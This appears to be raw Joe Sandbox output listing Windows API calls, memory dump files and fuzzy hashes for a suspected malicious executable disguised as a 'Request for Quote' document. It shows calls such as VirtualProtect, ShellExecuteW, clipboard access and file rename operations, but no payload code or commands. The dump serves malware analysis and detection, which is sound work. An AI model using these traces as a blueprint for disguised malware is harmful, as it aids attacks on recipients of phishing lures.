                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                          • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                          • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3850602802-0
                                                                                          • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                          • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                          • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                          • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FilePointer
                                                                                          • String ID:
                                                                                          • API String ID: 973152223-0
                                                                                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocGlobal
                                                                                          • String ID:
                                                                                          • API String ID: 3761449716-0
                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                          • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                          • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                            • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                          • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                          • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                          • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                          • CreatePopupMenu.USER32 ref: 00405562
                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                          • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                          • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                          • EmptyClipboard.USER32 ref: 004055FD
                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                          • CloseClipboard.USER32 ref: 00405658
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                          • String ID: {
                                                                                          • API String ID: 590372296-366298937
                                                                                          • Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                          • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                          • Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                          • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                          • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 0040473D
                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                            • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061E1
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061F5
                                                                                            • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00406208
                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                          • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
                                                                                          • API String ID: 2246997448-3461569884
                                                                                          • Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                          • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                          • Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                          • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID:
                                                                                          • API String ID: 1974802433-0
                                                                                          • Opcode ID: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                          • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
                                                                                          • Opcode Fuzzy Hash: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                          • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                                          APIs
                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                          • GetSysColor.USER32(?), ref: 004043AC
                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                          • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                          • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                          • SetCursor.USER32(00000000), ref: 004044CE
                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                          • SetCursor.USER32(00000000), ref: 004044F2
                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                          • String ID: CB@$Call$N$open
                                                                                          • API String ID: 3615053054-4184941720
                                                                                          • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                          • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                          • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                          • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                          APIs
                                                                                          • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                          • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                            • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                            • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                          • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                          • wsprintfA.USER32 ref: 00405C80
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,80000000,00000003), ref: 00405B5A
                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                          • API String ID: 1265525490-3322868524
                                                                                          • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                          • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                          • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                          • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                          • String ID: F
                                                                                          • API String ID: 941294808-1304234792
                                                                                          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 100024E1
                                                                                          • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
